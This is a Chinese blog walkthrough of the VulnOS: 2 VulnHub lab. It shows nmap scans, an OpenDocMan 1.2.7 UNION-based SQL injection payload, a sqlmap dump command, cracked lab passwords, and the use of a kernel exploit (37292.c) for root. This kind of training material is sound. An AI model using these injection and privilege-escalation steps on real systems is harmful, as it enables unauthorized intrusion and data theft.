VulnHub-VulnOS: 2 靶场渗透测试

时间:2021.2.23

靶场信息:
地址:https://www.vulnhub.com/entry/vulnos-2,147/
发布日期:2016年5月17日
目标:得到root权限&找到flag.txt

一、信息收集

1、获取靶机IP地址

nmap -sP 192.168.1.0/24

image-20210223204148647

由探测的结果可知,靶机的IP为192.168.1.9

2、扫描开放的端口和服务

nmap -sS -sV -T5 -p- 192.168.1.9

image-20210223204253073

得到开放的端口信息:

22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open  irc     ngircd

3、网站信息收集

由于80端口开放了一个web应用,我们浏览器访问看看

image-20210223204530390

点击下方红色字体的website,就跳到如下页面

image-20210223204640962

随便点点,在点击Documentation后,发现是一个黑色背景,我们Ctrl+A全选,发现一些黑色的字体,里面透露了一个目录

image-20210223204934024

我们访问看看

image-20210223205045433

二、漏洞探测

在页面的左下角发现,网站是用OpenDocMan搭建的一个DMS,并且版本为1.2.7,我们在google搜索一下相关的漏洞

image-20210223205353355

点进去之后,发现这个版本有两个漏洞利用,一个是SQL注入,另外一个是访问控制不当

image-20210223205717656

三、漏洞利用

我们就利用SQL注入来试试,官方的给的payload是

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9

image-20210223210037526

果然把数据库版本给注出来了,那接下来就直接用sqlmap去跑

image-20210223212139577

image-20210223212155259

image-20210223212210633

最后就直接dump数据

sqlmap -u "http://192.168.1.9/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --level 3 -D jabcd0cs -T odm_user -C id,username,password --dump

image-20210223212337316

将获得的md5值解开得到

084e0343a0486ff05530df6c705c8bb4:guest
b78aae356709f8c31118ea613980954b:webmin1980

获得了用户名和密码之后,我们通过ssh去登录

image-20210223212645482

获取一下内核和系统版本信息

image-20210223212851341

根据得出的信息,我们可以直接在kali里面搜索相关的EXP

image-20210223213036356

四、提权

将37292.c传到靶机上

image-20210223213324614

然后将EXP编译运行,得到root权限之后,即可查看flag

image-20210223213431053

总结

提权的方法在前面的靶机遇到过,所以做起来就很快。

posted @ 2021-02-23 21:38  l2sec  阅读(125)  评论(0编辑  收藏  举报